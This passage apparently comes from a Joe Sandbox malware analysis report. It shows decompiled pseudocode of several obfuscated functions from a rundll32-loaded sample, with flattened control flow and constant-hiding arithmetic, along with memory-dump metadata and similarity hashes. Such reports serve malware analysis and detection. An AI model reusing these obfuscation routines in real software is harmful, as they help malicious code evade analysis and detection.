                                                                                                                                                            						__eflags = _v84 - 6;
                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                            							E0037F09B( &_v108);
                                                                                                                                                            							goto L13;
                                                                                                                                                            						}
                                                                                                                                                            						_t173 = 0x483085d;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					__eflags = _t173 - 0xe7b6043;
                                                                                                                                                            					if(_t173 == 0xe7b6043) {
                                                                                                                                                            						_t166 = E0037E5CF( &_v48, _v140,  &_v112, _v148);
                                                                                                                                                            						asm("sbb ecx, ecx");
                                                                                                                                                            						_t173 = ( ~_t166 & 0x01cb4a56) + 0x45d7e1c;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					__eflags = _t173 - 0xf62a13b;
                                                                                                                                                            					if(_t173 != 0xf62a13b) {
                                                                                                                                                            						goto L45;
                                                                                                                                                            					}
                                                                                                                                                            					E00373DBC( &_v40, _a4, _v136, _v156, _v128);
                                                                                                                                                            					_t216 = _t216 + 0xc;
                                                                                                                                                            					_t173 = 0x4fb7fc6;
                                                                                                                                                            				}
                                                                                                                                                            			}
                                                                                                                                                            0x0037b601

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: V$h5$kn=
                                                                                                                                                            • API String ID: 0-2568719763
                                                                                                                                                            • Opcode ID: aacf19be9e4207d32f4d276c3205fb8bf5cbacce37d65fab8ed6cd949a1a81f2
                                                                                                                                                            • Instruction ID: a5cff1b3e6252597811945ef06705888728b00cfde3726200fedbc8e45d41c89
                                                                                                                                                            • Opcode Fuzzy Hash: aacf19be9e4207d32f4d276c3205fb8bf5cbacce37d65fab8ed6cd949a1a81f2
                                                                                                                                                            • Instruction Fuzzy Hash: A3A18771108340CBC73ADF66D49562BFBF5FB85318F14892EF29A86261D7399A09CF42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                            			E00384116() {
                                                                                                                                                            				char _v524;
                                                                                                                                                            				intOrPtr _v548;
                                                                                                                                                            				char _v564;
                                                                                                                                                            				intOrPtr _v568;
                                                                                                                                                            				char _v572;
                                                                                                                                                            				signed int _v576;
                                                                                                                                                            				signed int _v580;
                                                                                                                                                            				signed int _v584;
                                                                                                                                                            				signed int _v588;
                                                                                                                                                            				signed int _v592;
                                                                                                                                                            				signed int _v596;
                                                                                                                                                            				signed int _v600;
                                                                                                                                                            				signed int _v604;
                                                                                                                                                            				signed int _v608;
                                                                                                                                                            				signed int _v612;
                                                                                                                                                            				signed int _v616;
                                                                                                                                                            				signed int _v620;
                                                                                                                                                            				signed int _v624;
                                                                                                                                                            				signed int _v628;
                                                                                                                                                            				signed int _v632;
                                                                                                                                                            				signed int _v636;
                                                                                                                                                            				signed int _v640;
                                                                                                                                                            				signed int _v644;
                                                                                                                                                            				signed int _v648;
                                                                                                                                                            				signed int _v652;
                                                                                                                                                            				signed int _v656;
                                                                                                                                                            				signed int _t220;
                                                                                                                                                            				signed int _t222;
                                                                                                                                                            				void* _t224;
                                                                                                                                                            				void* _t226;
                                                                                                                                                            				void* _t227;
                                                                                                                                                            				signed int _t229;
                                                                                                                                                            				signed int _t230;
                                                                                                                                                            				signed int _t231;
                                                                                                                                                            				signed int _t232;
                                                                                                                                                            				signed int _t233;
                                                                                                                                                            				signed int _t250;
                                                                                                                                                            				void* _t253;
                                                                                                                                                            				void* _t258;
                                                                                                                                                            				void* _t260;
                                                                                                                                                            
                                                                                                                                                            				_v604 = 0x9b146b;
                                                                                                                                                            				_v604 = _v604 | 0x658b3ccc;
                                                                                                                                                            				_v604 = _v604 + 0xfffff1f3;
                                                                                                                                                            				_v604 = _v604 ^ 0x659b2e62;
                                                                                                                                                            				_v596 = 0xb07d39;
                                                                                                                                                            				_v596 = _v596 | 0x89b98cff;
                                                                                                                                                            				_v596 = _v596 ^ 0x89b9fdfe;
                                                                                                                                                            				_v584 = 0x342693;
                                                                                                                                                            				_v584 = _v584 ^ 0x5537c6ac;
                                                                                                                                                            				_v584 = _v584 ^ 0x5503e03c;
                                                                                                                                                            				_v628 = 0x844a73;
                                                                                                                                                            				_v628 = _v628 | 0x8aea995b;
                                                                                                                                                            				_v628 = _v628 >> 3;
                                                                                                                                                            				_v628 = _v628 ^ 0x3316179a;
                                                                                                                                                            				_v628 = _v628 ^ 0x224eeca0;
                                                                                                                                                            				_v644 = 0xac1c02;
                                                                                                                                                            				_v644 = _v644 * 0x6d;
                                                                                                                                                            				_t227 = 0;
                                                                                                                                                            				_v644 = _v644 << 0xf;
                                                                                                                                                            				_t253 = 0x9728f62;
                                                                                                                                                            				_t229 = 0x52;
                                                                                                                                                            				_v644 = _v644 * 0x23;
                                                                                                                                                            				_v644 = _v644 ^ 0xb0e78180;
                                                                                                                                                            				_v636 = 0x949b2b;
                                                                                                                                                            				_v636 = _v636 / _t229;
                                                                                                                                                            				_v636 = _v636 << 4;
                                                                                                                                                            				_t230 = 0x48;
                                                                                                                                                            				_v636 = _v636 / _t230;
                                                                                                                                                            				_v636 = _v636 ^ 0x000805f9;
                                                                                                                                                            				_v652 = 0x50f951;
                                                                                                                                                            				_v652 = _v652 << 0xe;
                                                                                                                                                            				_v652 = _v652 + 0xffff7357;
                                                                                                                                                            				_v652 = _v652 >> 5;
                                                                                                                                                            				_v652 = _v652 ^ 0x01f330c3;
                                                                                                                                                            				_v624 = 0xa7ee55;
                                                                                                                                                            				_v624 = _v624 + 0x328f;
                                                                                                                                                            				_t231 = 0x36;
                                                                                                                                                            				_v624 = _v624 / _t231;
                                                                                                                                                            				_v624 = _v624 + 0x3260;
                                                                                                                                                            				_v624 = _v624 ^ 0x000caec1;
                                                                                                                                                            				_v632 = 0x45b476;
                                                                                                                                                            				_v632 = _v632 << 0xf;
                                                                                                                                                            				_v632 = _v632 + 0x3fe9;
                                                                                                                                                            				_v632 = _v632 + 0xffffc242;
                                                                                                                                                            				_v632 = _v632 ^ 0xda30ae70;
                                                                                                                                                            				_v576 = 0xb3f46f;
                                                                                                                                                            				_v576 = _v576 >> 0xe;
                                                                                                                                                            				_v576 = _v576 ^ 0x000becca;
                                                                                                                                                            				_v640 = 0x899e10;
                                                                                                                                                            				_v640 = _v640 << 3;
                                                                                                                                                            				_v640 = _v640 | 0x15c6522a;
                                                                                                                                                            				_v640 = _v640 >> 0xc;
                                                                                                                                                            				_v640 = _v640 ^ 0x00018fe0;
                                                                                                                                                            				_v648 = 0x6b2405;
                                                                                                                                                            				_v648 = _v648 | 0xec8a856c;
                                                                                                                                                            				_v648 = _v648 + 0xffffe7b2;
                                                                                                                                                            				_v648 = _v648 >> 0xd;
                                                                                                                                                            				_v648 = _v648 ^ 0x000a0717;
                                                                                                                                                            				_v608 = 0xd62f5d;
                                                                                                                                                            				_v608 = _v608 + 0xffffa804;
                                                                                                                                                            				_v608 = _v608 >> 1;
                                                                                                                                                            				_v608 = _v608 ^ 0x00686b18;
                                                                                                                                                            				_v580 = 0x2fce72;
                                                                                                                                                            				_t232 = 6;
                                                                                                                                                            				_v580 = _v580 / _t232;
                                                                                                                                                            				_v580 = _v580 ^ 0x000627ef;
                                                                                                                                                            				_v612 = 0xa7d19a;
                                                                                                                                                            				_v612 = _v612 ^ 0x125f9685;
                                                                                                                                                            				_v612 = _v612 ^ 0x35fdcbd7;
                                                                                                                                                            				_v612 = _v612 ^ 0x270c67d8;
                                                                                                                                                            				_v656 = 0x784491;
                                                                                                                                                            				_v656 = _v656 >> 9;
                                                                                                                                                            				_v656 = _v656 | 0xfbff7fff;
                                                                                                                                                            				_v656 = _v656 ^ 0xfbf9abc9;
                                                                                                                                                            				_v616 = 0xc21bdd;
                                                                                                                                                            				_t233 = 0x58;
                                                                                                                                                            				_v616 = _v616 / _t233;
                                                                                                                                                            				_v616 = _v616 | 0xde7eb344;
                                                                                                                                                            				_v616 = _v616 ^ 0xde714edb;
                                                                                                                                                            				_v620 = 0x22ba29;
                                                                                                                                                            				_v620 = _v620 + 0xc334;
                                                                                                                                                            				_v620 = _v620 ^ 0x41b5236d;
                                                                                                                                                            				_v620 = _v620 ^ 0x4193ad78;
                                                                                                                                                            				_v588 = 0x61092c;
                                                                                                                                                            				_v588 = _v588 | 0xfbe761ce;
                                                                                                                                                            				_v588 = _v588 ^ 0xfbe7142a;
                                                                                                                                                            				_v600 = 0xd9609d;
                                                                                                                                                            				_v600 = _v600 | 0x95d54fcb;
                                                                                                                                                            				_v600 = _v600 ^ 0x95d705b7;
                                                                                                                                                            				_v592 = 0xc80f6b;
                                                                                                                                                            				_t234 = 0x42;
                                                                                                                                                            				_t252 = _v600;
                                                                                                                                                            				_v592 = _v592 / _t234;
                                                                                                                                                            				_v592 = _v592 ^ 0x0000156e;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t253 != 0x25f6a69) {
                                                                                                                                                            						if(_t253 == 0x9728f62) {
                                                                                                                                                            							_t253 = 0xea70970;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t253 == 0x9c0fe90) {
                                                                                                                                                            								_t250 = _v632;
                                                                                                                                                            								_t220 = E00378F65(_v624, _t250,  &_v524, _v576, _t227, _v624, _v604, _v640, _v584, _v648, _v624, _v596);
                                                                                                                                                            								_t252 = _t220;
                                                                                                                                                            								_t260 = _t260 + 0x28;
                                                                                                                                                            								__eflags = _t220 - 0xffffffff;
                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                            									_t253 = 0xaccbeb9;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t253 == 0xaccbeb9) {
                                                                                                                                                            									_t222 = E00379350( &_v564, _t252, _v608, _v580, _t234, _v612);
                                                                                                                                                            									asm("sbb esi, esi");
                                                                                                                                                            									_t250 = _v616;
                                                                                                                                                            									_t253 = ( ~_t222 & 0x010509a4) + 0x15a60c5;
                                                                                                                                                            									_t234 = _v656;
                                                                                                                                                            									E00381E67(_v656, _t250, _v620, _v588, _t252);
                                                                                                                                                            									_t260 = _t260 + 0x20;
                                                                                                                                                            									goto L14;
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t253 == 0xdba0984) {
                                                                                                                                                            										_t224 = E0038ABD1();
                                                                                                                                                            										_t258 = _v572 - _v548;
                                                                                                                                                            										asm("sbb ecx, [esp+0x84]");
                                                                                                                                                            										__eflags = _v568 - _t250;
                                                                                                                                                            										if(__eflags >= 0) {
                                                                                                                                                            											if(__eflags > 0) {
                                                                                                                                                            												L19:
                                                                                                                                                            												_t227 = 1;
                                                                                                                                                            												__eflags = 1;
                                                                                                                                                            											} else {
                                                                                                                                                            												__eflags = _t258 - _t224;
                                                                                                                                                            												if(_t258 >= _t224) {
                                                                                                                                                            													goto L19;
                                                                                                                                                            												}
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									} else {
                                                                                                                                                            										_t268 = _t253 - 0xea70970;
                                                                                                                                                            										if(_t253 != 0xea70970) {
                                                                                                                                                            											goto L14;
                                                                                                                                                            										} else {
                                                                                                                                                            											_t250 = _v644;
                                                                                                                                                            											_t234 = _v628;
                                                                                                                                                            											_t226 = E0038DA22(_v628, _t250, _t268, _v636,  &_v524, _v628, _v652);
                                                                                                                                                            											_t260 = _t260 + 0x10;
                                                                                                                                                            											if(_t226 != 0) {
                                                                                                                                                            												_t253 = 0x9c0fe90;
                                                                                                                                                            												continue;
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L20:
                                                                                                                                                            						return _t227;
                                                                                                                                                            					}
                                                                                                                                                            					E0038C1EC(_v600, _v592,  &_v572);
                                                                                                                                                            					_pop(_t234);
                                                                                                                                                            					_t253 = 0xdba0984;
                                                                                                                                                            					L14:
                                                                                                                                                            					__eflags = _t253 - 0x15a60c5;
                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                            				goto L20;
                                                                                                                                                            			}











































                                                                                                                                                            0x0038452d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038452d
                                                                                                                                                            0x00384529
                                                                                                                                                            0x00384413
                                                                                                                                                            0x00384413
                                                                                                                                                            0x00384419
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038441f
                                                                                                                                                            0x00384430
                                                                                                                                                            0x00384434
                                                                                                                                                            0x00384438
                                                                                                                                                            0x0038443d
                                                                                                                                                            0x00384442
                                                                                                                                                            0x00384448
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00384448
                                                                                                                                                            0x00384442
                                                                                                                                                            0x00384419
                                                                                                                                                            0x0038440d
                                                                                                                                                            0x00384405
                                                                                                                                                            0x003843f9
                                                                                                                                                            0x00384535
                                                                                                                                                            0x0038453e
                                                                                                                                                            0x0038453e
                                                                                                                                                            0x003844f1
                                                                                                                                                            0x003844f6
                                                                                                                                                            0x003844f7
                                                                                                                                                            0x003844fc
                                                                                                                                                            0x003844fc
                                                                                                                                                            0x003844fc
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,a$`2$?
                                                                                                                                                            • API String ID: 0-2087061617
                                                                                                                                                            • Opcode ID: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                                                            • Instruction ID: f4af7eabefa371e893d3965cb6767bf59d4ae73b679af89ec3aa3a85b3fea595
                                                                                                                                                            • Opcode Fuzzy Hash: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                                                            • Instruction Fuzzy Hash: A7A130725083419FC369DF65C88A40FFBF1BBC5708F008A5DF59A96260D3B58A09CF86
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E003759F2() {
                                                                                                                                                            				char _v520;
                                                                                                                                                            				char _v1040;
                                                                                                                                                            				intOrPtr _v1044;
                                                                                                                                                            				intOrPtr _v1048;
                                                                                                                                                            				intOrPtr _v1052;
                                                                                                                                                            				intOrPtr _v1056;
                                                                                                                                                            				signed int _v1060;
                                                                                                                                                            				signed int _v1064;
                                                                                                                                                            				signed int _v1068;
                                                                                                                                                            				signed int _v1072;
                                                                                                                                                            				signed int _v1076;
                                                                                                                                                            				signed int _v1080;
                                                                                                                                                            				signed int _v1084;
                                                                                                                                                            				signed int _v1088;
                                                                                                                                                            				signed int _v1092;
                                                                                                                                                            				signed int _v1096;
                                                                                                                                                            				signed int _v1100;
                                                                                                                                                            				signed int _v1104;
                                                                                                                                                            				signed int _v1108;
                                                                                                                                                            				signed int _v1112;
                                                                                                                                                            				signed int _v1116;
                                                                                                                                                            				signed int _v1120;
                                                                                                                                                            				signed int _v1124;
                                                                                                                                                            				signed int _v1128;
                                                                                                                                                            				signed int _v1132;
                                                                                                                                                            				signed int _v1136;
                                                                                                                                                            				signed int _v1140;
                                                                                                                                                            				void* _t202;
                                                                                                                                                            				void* _t208;
                                                                                                                                                            				intOrPtr _t209;
                                                                                                                                                            				void* _t214;
                                                                                                                                                            				void* _t222;
                                                                                                                                                            				intOrPtr _t237;
                                                                                                                                                            				intOrPtr _t240;
                                                                                                                                                            				signed int _t241;
                                                                                                                                                            				signed int _t242;
                                                                                                                                                            				signed int _t243;
                                                                                                                                                            				signed int _t244;
                                                                                                                                                            				signed int* _t247;
                                                                                                                                                            
                                                                                                                                                            				_t247 =  &_v1140;
                                                                                                                                                            				_v1056 = 0x36f622;
                                                                                                                                                            				_v1052 = 0x8ed67e;
                                                                                                                                                            				_t214 = 0xf737bb2;
                                                                                                                                                            				_v1048 = 0x93fb3c;
                                                                                                                                                            				_t240 = 0;
                                                                                                                                                            				_v1044 = 0;
                                                                                                                                                            				_v1076 = 0x48eb17;
                                                                                                                                                            				_v1076 = _v1076 + 0x189d;
                                                                                                                                                            				_v1076 = _v1076 ^ 0x00442401;
                                                                                                                                                            				_v1100 = 0xa45863;
                                                                                                                                                            				_v1100 = _v1100 << 2;
                                                                                                                                                            				_t241 = 0x1d;
                                                                                                                                                            				_v1100 = _v1100 * 0x7c;
                                                                                                                                                            				_v1100 = _v1100 ^ 0x3e6538f4;
                                                                                                                                                            				_v1108 = 0x56f1ad;
                                                                                                                                                            				_v1108 = _v1108 | 0xbff0a597;
                                                                                                                                                            				_v1108 = _v1108 / _t241;
                                                                                                                                                            				_v1108 = _v1108 ^ 0x06946226;
                                                                                                                                                            				_v1132 = 0xc3fd0a;
                                                                                                                                                            				_v1132 = _v1132 << 8;
                                                                                                                                                            				_v1132 = _v1132 + 0xffff9bc2;
                                                                                                                                                            				_t242 = 0x18;
                                                                                                                                                            				_v1132 = _v1132 / _t242;
                                                                                                                                                            				_v1132 = _v1132 ^ 0x0821d39f;
                                                                                                                                                            				_v1068 = 0xc66dea;
                                                                                                                                                            				_v1068 = _v1068 + 0xffff0514;
                                                                                                                                                            				_v1068 = _v1068 ^ 0x00c0919e;
                                                                                                                                                            				_v1136 = 0x72811d;
                                                                                                                                                            				_v1136 = _v1136 ^ 0x5ea2c622;
                                                                                                                                                            				_t243 = 0x5d;
                                                                                                                                                            				_v1136 = _v1136 * 0x4f;
                                                                                                                                                            				_v1136 = _v1136 * 0x41;
                                                                                                                                                            				_v1136 = _v1136 ^ 0xd3c4c324;
                                                                                                                                                            				_v1096 = 0x2e25e6;
                                                                                                                                                            				_v1096 = _v1096 ^ 0xbdbebaf9;
                                                                                                                                                            				_v1096 = _v1096 ^ 0xbd932287;
                                                                                                                                                            				_v1060 = 0x3d42d8;
                                                                                                                                                            				_v1060 = _v1060 << 6;
                                                                                                                                                            				_v1060 = _v1060 ^ 0x0f5887f2;
                                                                                                                                                            				_v1116 = 0xec9c1f;
                                                                                                                                                            				_v1116 = _v1116 >> 1;
                                                                                                                                                            				_v1116 = _v1116 + 0xcef9;
                                                                                                                                                            				_v1116 = _v1116 ^ 0x0078140d;
                                                                                                                                                            				_v1084 = 0xf6a299;
                                                                                                                                                            				_v1084 = _v1084 >> 9;
                                                                                                                                                            				_v1084 = _v1084 ^ 0x00023821;
                                                                                                                                                            				_v1124 = 0xf6e97d;
                                                                                                                                                            				_v1124 = _v1124 + 0xffff8c4c;
                                                                                                                                                            				_v1124 = _v1124 / _t243;
                                                                                                                                                            				_v1124 = _v1124 | 0xda1c672f;
                                                                                                                                                            				_v1124 = _v1124 ^ 0xda1e012d;
                                                                                                                                                            				_v1120 = 0x9bdb66;
                                                                                                                                                            				_v1120 = _v1120 * 0x47;
                                                                                                                                                            				_v1120 = _v1120 + 0xdb13;
                                                                                                                                                            				_v1120 = _v1120 * 0x64;
                                                                                                                                                            				_v1120 = _v1120 ^ 0xe2e3c71f;
                                                                                                                                                            				_v1112 = 0x9fec0e;
                                                                                                                                                            				_v1112 = _v1112 << 0xc;
                                                                                                                                                            				_v1112 = _v1112 | 0xd7512eb2;
                                                                                                                                                            				_v1112 = _v1112 ^ 0xffdc645c;
                                                                                                                                                            				_v1104 = 0xc74eee;
                                                                                                                                                            				_v1104 = _v1104 + 0x930c;
                                                                                                                                                            				_v1104 = _v1104 ^ 0x28280d38;
                                                                                                                                                            				_v1104 = _v1104 ^ 0x28ef0d26;
                                                                                                                                                            				_v1064 = 0xc36095;
                                                                                                                                                            				_v1064 = _v1064 | 0x2d8f7273;
                                                                                                                                                            				_v1064 = _v1064 ^ 0x2dcb1501;
                                                                                                                                                            				_v1140 = 0xa3c477;
                                                                                                                                                            				_v1140 = _v1140 ^ 0xb16da3ec;
                                                                                                                                                            				_v1140 = _v1140 ^ 0x8917fdcb;
                                                                                                                                                            				_v1140 = _v1140 >> 0xe;
                                                                                                                                                            				_v1140 = _v1140 ^ 0x000e0fa0;
                                                                                                                                                            				_v1128 = 0x58136;
                                                                                                                                                            				_v1128 = _v1128 << 6;
                                                                                                                                                            				_v1128 = _v1128 << 0x10;
                                                                                                                                                            				_v1128 = _v1128 + 0xffffe729;
                                                                                                                                                            				_v1128 = _v1128 ^ 0x4d79f308;
                                                                                                                                                            				_v1072 = 0x735c84;
                                                                                                                                                            				_t244 = 0x7f;
                                                                                                                                                            				_v1072 = _v1072 / _t244;
                                                                                                                                                            				_v1072 = _v1072 ^ 0x0002b970;
                                                                                                                                                            				_v1080 = 0x91f75b;
                                                                                                                                                            				_v1080 = _v1080 + 0xffffc39e;
                                                                                                                                                            				_v1080 = _v1080 ^ 0x009f463e;
                                                                                                                                                            				_v1088 = 0xdf4dcf;
                                                                                                                                                            				_v1088 = _v1088 | 0x05792173;
                                                                                                                                                            				_v1088 = _v1088 ^ 0x05f69aec;
                                                                                                                                                            				_v1092 = 0xf44447;
                                                                                                                                                            				_v1092 = _v1092 * 0x78;
                                                                                                                                                            				_v1092 = _v1092 ^ 0x728504a1;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t214 != 0x89b0ee) {
                                                                                                                                                            						if(_t214 == 0x291094f) {
                                                                                                                                                            							E00373C3C(_v1072, _v1080,  &_v1040, _v1088, _v1092);
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t214 == 0x6a25a64) {
                                                                                                                                                            								E0038DA22(_v1076, _v1100, __eflags, _v1108,  &_v520, _t214, _v1132);
                                                                                                                                                            								_t247 =  &(_t247[4]);
                                                                                                                                                            								_t214 = 0xe0c4196;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t214 == 0xe0c4196) {
                                                                                                                                                            									_push(_v1096);
                                                                                                                                                            									_push(_v1136);
                                                                                                                                                            									_t208 = E0038DCF7(_v1068, 0x371000, __eflags);
                                                                                                                                                            									_pop(_t222);
                                                                                                                                                            									_t209 =  *0x393e10; // 0x0
                                                                                                                                                            									_t237 =  *0x393e10; // 0x0
                                                                                                                                                            									E003747CE(_t237 + 0x23c, _v1060, _t222, _v1116, _v1084, _t208, _t209 + 0x1c, _v1124, _v1120);
                                                                                                                                                            									E0037A8B0(_v1112, _t208, _v1104);
                                                                                                                                                            									_t247 =  &(_t247[9]);
                                                                                                                                                            									_t214 = 0x89b0ee;
                                                                                                                                                            									continue;
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t214 != 0xf737bb2) {
                                                                                                                                                            										goto L10;
                                                                                                                                                            									} else {
                                                                                                                                                            										_t214 = 0x6a25a64;
                                                                                                                                                            										continue;
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L13:
                                                                                                                                                            						return _t240;
                                                                                                                                                            					}
                                                                                                                                                            					_push(_v1128);
                                                                                                                                                            					_push( &_v1040);
                                                                                                                                                            					_push(_v1140);
                                                                                                                                                            					_t202 = E003913AD(_v1064,  &_v520, __eflags);
                                                                                                                                                            					_t247 =  &(_t247[3]);
                                                                                                                                                            					__eflags = _t202;
                                                                                                                                                            					_t240 =  !=  ? 1 : _t240;
                                                                                                                                                            					_t214 = 0x291094f;
                                                                                                                                                            					L10:
                                                                                                                                                            					__eflags = _t214 - 0xb653a05;
                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                            				goto L13;
                                                                                                                                                            			}










































                                                                                                                                                            0x00375d90
                                                                                                                                                            0x00375d97
                                                                                                                                                            0x00375d9b
                                                                                                                                                            0x00375d9d
                                                                                                                                                            0x00375da0
                                                                                                                                                            0x00375da5
                                                                                                                                                            0x00375da5
                                                                                                                                                            0x00375da5
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: &($&($%.
                                                                                                                                                            • API String ID: 0-466442461
                                                                                                                                                            • Opcode ID: 1fa5815adaab6488fb8d8ce76defae62ded81f8a118374e3a4c58ba2bd075cc9
                                                                                                                                                            • Instruction ID: 574063f0214be49e9d4a6f36e925a37c831c0946b6430893b6dfac90b4235a84
                                                                                                                                                            • Opcode Fuzzy Hash: 1fa5815adaab6488fb8d8ce76defae62ded81f8a118374e3a4c58ba2bd075cc9
                                                                                                                                                            • Instruction Fuzzy Hash: 53A12FB11083819FC769CF66C58941BFBF1FBC4758F108A1DF5A696220D7B98A0ACF46
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                            			E003913AD(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                            				void* _t197;
                                                                                                                                                            				signed int _t222;
                                                                                                                                                            				signed int _t226;
                                                                                                                                                            				void* _t236;
                                                                                                                                                            				void* _t245;
                                                                                                                                                            				void* _t246;
                                                                                                                                                            
                                                                                                                                                            				_t245 = _t246 - 0x6c;
                                                                                                                                                            				_push( *((intOrPtr*)(_t245 + 0x7c)));
                                                                                                                                                            				_push( *((intOrPtr*)(_t245 + 0x78)));
                                                                                                                                                            				_push( *((intOrPtr*)(_t245 + 0x74)));
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t197);
                                                                                                                                                            				 *(_t245 + 0x10) =  *(_t245 + 0x10) & 0x00000000;
                                                                                                                                                            				 *(_t245 + 0x14) =  *(_t245 + 0x14) & 0x00000000;
                                                                                                                                                            				 *((intOrPtr*)(_t245 + 8)) = 0x9cee1d;
                                                                                                                                                            				 *((intOrPtr*)(_t245 + 0xc)) = 0x3f83c9;
                                                                                                                                                            				 *(_t245 + 0x38) = 0xf8747;
                                                                                                                                                            				 *(_t245 + 0x38) =  *(_t245 + 0x38) | 0x414cebc6;
                                                                                                                                                            				 *(_t245 + 0x38) =  *(_t245 + 0x38) << 1;
                                                                                                                                                            				 *(_t245 + 0x38) =  *(_t245 + 0x38) ^ 0x829fdf8f;
                                                                                                                                                            				 *(_t245 + 0x4c) = 0x1e90b9;
                                                                                                                                                            				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x5b;
                                                                                                                                                            				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x75;
                                                                                                                                                            				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x4c;
                                                                                                                                                            				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) ^ 0x63bb7720;
                                                                                                                                                            				 *(_t245 + 0x54) = 0x94d35;
                                                                                                                                                            				 *(_t245 + 0x54) =  *(_t245 + 0x54) | 0xafff8ff7;
                                                                                                                                                            				 *(_t245 + 0x54) =  *(_t245 + 0x54) ^ 0xafffc7f7;
                                                                                                                                                            				 *(_t245 + 0x40) = 0x2ce8ae;
                                                                                                                                                            				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 0xe;
                                                                                                                                                            				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 2;
                                                                                                                                                            				 *(_t245 + 0x40) =  *(_t245 + 0x40) ^ 0xe8aa4789;
                                                                                                                                                            				 *(_t245 + 0x58) = 0x43e6f3;
                                                                                                                                                            				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff66dc;
                                                                                                                                                            				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff2d2d;
                                                                                                                                                            				 *(_t245 + 0x58) =  *(_t245 + 0x58) << 3;
                                                                                                                                                            				 *(_t245 + 0x58) =  *(_t245 + 0x58) ^ 0x021485d0;
                                                                                                                                                            				 *(_t245 + 0x24) = 0x72d00d;
                                                                                                                                                            				 *(_t245 + 0x24) =  *(_t245 + 0x24) + 0xff2c;
                                                                                                                                                            				 *(_t245 + 0x24) =  *(_t245 + 0x24) ^ 0x0076519a;
                                                                                                                                                            				 *(_t245 + 0x34) = 0x43d743;
                                                                                                                                                            				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff7104;
                                                                                                                                                            				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff9485;
                                                                                                                                                            				 *(_t245 + 0x34) =  *(_t245 + 0x34) ^ 0x004ddf56;
